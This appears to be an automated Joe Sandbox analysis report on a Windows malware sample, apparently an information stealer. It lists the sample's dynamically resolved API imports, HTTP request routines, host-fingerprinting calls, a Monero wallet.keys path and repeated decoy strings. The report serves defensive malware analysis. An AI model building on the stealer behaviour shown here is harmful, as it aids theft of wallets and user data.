                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA46AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA45E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA45DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA45F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA46D8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA45D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA45C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA46C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA46B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA466D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: c912dca730f0dda883c5f0fd622077930b4181cfbf4e3ae7ec6aaceb9b5120fb
                                    • Instruction ID: cc5c3648e279c382ed3f68426742d192933257871dfac18fb9eb7c64ec2eba70
                                    • Opcode Fuzzy Hash: c912dca730f0dda883c5f0fd622077930b4181cfbf4e3ae7ec6aaceb9b5120fb
                                    • Instruction Fuzzy Hash: EC41F1606F7A057AC778B7A48D5BFDD76665F82F10FA0504CB80052282CFB8E5887727
                                    Function 00FA4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 fa4880-fa4942 call fba7a0 call fa47b0 call fba740 * 5 InternetOpenA StrCmpCA 816 fa494b-fa494f 801->816 817 fa4944 801->817 818 fa4ecb-fa4ef3 InternetCloseHandle call fbaad0 call fa9ac0 816->818 819 fa4955-fa4acd call fb8b60 call fba920 call fba8a0 call fba800 * 2 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba920 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba920 call fba8a0 call fba800 * 2 InternetConnectA 816->819 817->816 828 fa4f32-fa4fa2 call fb8990 * 2 call fba7a0 call fba800 * 8 818->828 829 fa4ef5-fa4f2d call fba820 call fba9b0 call fba8a0 call fba800 818->829 819->818 905 fa4ad3-fa4ad7 819->905 829->828 906 fa4ad9-fa4ae3 905->906 907 fa4ae5 905->907 908 fa4aef-fa4b22 HttpOpenRequestA 906->908 907->908 909 fa4b28-fa4e28 call fba9b0 call fba8a0 call fba800 call fba920 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba920 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba920 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba9b0 call fba8a0 call fba800 call fba920 call fba8a0 call fba800 call fba740 call fba920 * 2 call fba8a0 call fba800 * 2 call fbaad0 lstrlen call fbaad0 * 2 lstrlen call fbaad0 HttpSendRequestA 908->909 910 fa4ebe-fa4ec5 InternetCloseHandle 908->910 1021 fa4e32-fa4e5c InternetReadFile 909->1021 910->818 1022 fa4e5e-fa4e65 1021->1022 1023 fa4e67-fa4eb9 InternetCloseHandle call fba800 1021->1023 1022->1023 1024 fa4e69-fa4ea7 call fba9b0 call fba8a0 call fba800 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FA4915
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA4ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00FC0DDB,00000000,?,?,00000000,?,",00000000,?,008CEAB8), ref: 00FA4DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FA4E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FA4E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FA4E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA4EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA4EC5
                                    • HttpOpenRequestA.WININET(00000000,008CEA38,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA4B15
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA4ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: dc7cb5f1598743e74b7f38e78cb57ee543ef502b7a513a0b3123ac50dbfe4f36
                                    • Instruction ID: 51cfc5bf3c0e2eb0050a00cab3d4a98ae08ee1a760f0232ba63ade2c5f39512e
                                    • Opcode Fuzzy Hash: dc7cb5f1598743e74b7f38e78cb57ee543ef502b7a513a0b3123ac50dbfe4f36
                                    • Instruction Fuzzy Hash: F5121F71910118AADB29EB91DDA2FEEB378BF14300F5041A9B10673491EF746F49EF62
                                    Function 00FB78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00FB792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 835719d76b3ea203905156543b944468e2a3375e9f0570272418ca8ee41b2ec1
                                    • Instruction ID: 956f6bc82b0e530cbc55540093fa929057c096b4d68c1883a414c6910ec286d9
                                    • Opcode Fuzzy Hash: 835719d76b3ea203905156543b944468e2a3375e9f0570272418ca8ee41b2ec1
                                    • Instruction Fuzzy Hash: 470162B1904205EBC714DFD5D945FAABBB8FB44B21F104229E555A7280D77459408BA1
                                    Function 00FB7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FA11B7), ref: 00FB7880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FB789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: a04bb21722a87135527dcb814ca5cac132ca86b829cdc8ed2ca0db00fb0f6850
                                    • Instruction ID: 5e4a00483e7a7b036c5c579192f605729323c33e93791009fd8e2abb5d9fb93f
                                    • Opcode Fuzzy Hash: a04bb21722a87135527dcb814ca5cac132ca86b829cdc8ed2ca0db00fb0f6850
                                    • Instruction Fuzzy Hash: 3AF04FB1D44208ABCB14DFD9D949FAEBBF8FB44711F10026AFA15A3680C77555448BA1
                                    Function 00FA1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: fa2c4395a7881c4de4c1513fa69653902d040942aa8ff09a9261228418276606
                                    • Instruction ID: 85527f3b8c3ae624b5626ee59eab297aadbf6824a1669d569e39817063fce08a
                                    • Opcode Fuzzy Hash: fa2c4395a7881c4de4c1513fa69653902d040942aa8ff09a9261228418276606
                                    • Instruction Fuzzy Hash: 38D01774D402089BCB14DAE0A84969DBBB8FB08212F000564E90662240EA3164C18BA5
                                    Function 00FB9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 fb9c10-fb9c1a 634 fb9c20-fba031 GetProcAddress * 43 633->634 635 fba036-fba0ca LoadLibraryA * 8 633->635 634->635 636 fba0cc-fba141 GetProcAddress * 5 635->636 637 fba146-fba14d 635->637 636->637 638 fba153-fba211 GetProcAddress * 8 637->638 639 fba216-fba21d 637->639 638->639 640 fba298-fba29f 639->640 641 fba21f-fba293 GetProcAddress * 5 639->641 642 fba337-fba33e 640->642 643 fba2a5-fba332 GetProcAddress * 6 640->643 641->640 644 fba41f-fba426 642->644 645 fba344-fba41a GetProcAddress * 9 642->645 643->642 646 fba428-fba49d GetProcAddress * 5 644->646 647 fba4a2-fba4a9 644->647 645->644 646->647 648 fba4ab-fba4d7 GetProcAddress * 2 647->648 649 fba4dc-fba4e3 647->649 648->649 650 fba515-fba51c 649->650 651 fba4e5-fba510 GetProcAddress * 2 649->651 652 fba612-fba619 650->652 653 fba522-fba60d GetProcAddress * 10 650->653 651->650 654 fba61b-fba678 GetProcAddress * 4 652->654 655 fba67d-fba684 652->655 653->652 654->655 656 fba69e-fba6a5 655->656 657 fba686-fba699 GetProcAddress 655->657 658 fba708-fba709 656->658 659 fba6a7-fba703 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,008B52F0), ref: 00FB9C2D
                                    • GetProcAddress.KERNEL32(74DD0000,008B5550), ref: 00FB9C45
                                    • GetProcAddress.KERNEL32(74DD0000,008C9430), ref: 00FB9C5E
                                    • GetProcAddress.KERNEL32(74DD0000,008C9460), ref: 00FB9C76
                                    • GetProcAddress.KERNEL32(74DD0000,008C9478), ref: 00FB9C8E
                                    • GetProcAddress.KERNEL32(74DD0000,008C9490), ref: 00FB9CA7
                                    • GetProcAddress.KERNEL32(74DD0000,008BBE58), ref: 00FB9CBF
                                    • GetProcAddress.KERNEL32(74DD0000,008CD078), ref: 00FB9CD7
                                    • GetProcAddress.KERNEL32(74DD0000,008CCEF8), ref: 00FB9CF0
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE80), ref: 00FB9D08
                                    • GetProcAddress.KERNEL32(74DD0000,008CD000), ref: 00FB9D20
                                    • GetProcAddress.KERNEL32(74DD0000,008B5330), ref: 00FB9D39
                                    • GetProcAddress.KERNEL32(74DD0000,008B5590), ref: 00FB9D51
                                    • GetProcAddress.KERNEL32(74DD0000,008B5510), ref: 00FB9D69
                                    • GetProcAddress.KERNEL32(74DD0000,008B5530), ref: 00FB9D82
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF28), ref: 00FB9D9A
                                    • GetProcAddress.KERNEL32(74DD0000,008CCDF0), ref: 00FB9DB2
                                    • GetProcAddress.KERNEL32(74DD0000,008BBED0), ref: 00FB9DCB
                                    • GetProcAddress.KERNEL32(74DD0000,008B55D0), ref: 00FB9DE3
                                    • GetProcAddress.KERNEL32(74DD0000,008CD030), ref: 00FB9DFB
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE98), ref: 00FB9E14
                                    • GetProcAddress.KERNEL32(74DD0000,008CD0A8), ref: 00FB9E2C
                                    • GetProcAddress.KERNEL32(74DD0000,008CCEB0), ref: 00FB9E44
                                    • GetProcAddress.KERNEL32(74DD0000,008B5370), ref: 00FB9E5D
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE08), ref: 00FB9E75
                                    • GetProcAddress.KERNEL32(74DD0000,008CD018), ref: 00FB9E8D
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF10), ref: 00FB9EA6
                                    • GetProcAddress.KERNEL32(74DD0000,008CD0C0), ref: 00FB9EBE
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF40), ref: 00FB9ED6
                                    • GetProcAddress.KERNEL32(74DD0000,008CD090), ref: 00FB9EEF
                                    • GetProcAddress.KERNEL32(74DD0000,008CCEC8), ref: 00FB9F07
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE38), ref: 00FB9F1F
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF58), ref: 00FB9F38
                                    • GetProcAddress.KERNEL32(74DD0000,008CA880), ref: 00FB9F50
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF70), ref: 00FB9F68
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF88), ref: 00FB9F81
                                    • GetProcAddress.KERNEL32(74DD0000,008B55F0), ref: 00FB9F99
                                    • GetProcAddress.KERNEL32(74DD0000,008CCFA0), ref: 00FB9FB1
                                    • GetProcAddress.KERNEL32(74DD0000,008B53B0), ref: 00FB9FCA
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE20), ref: 00FB9FE2
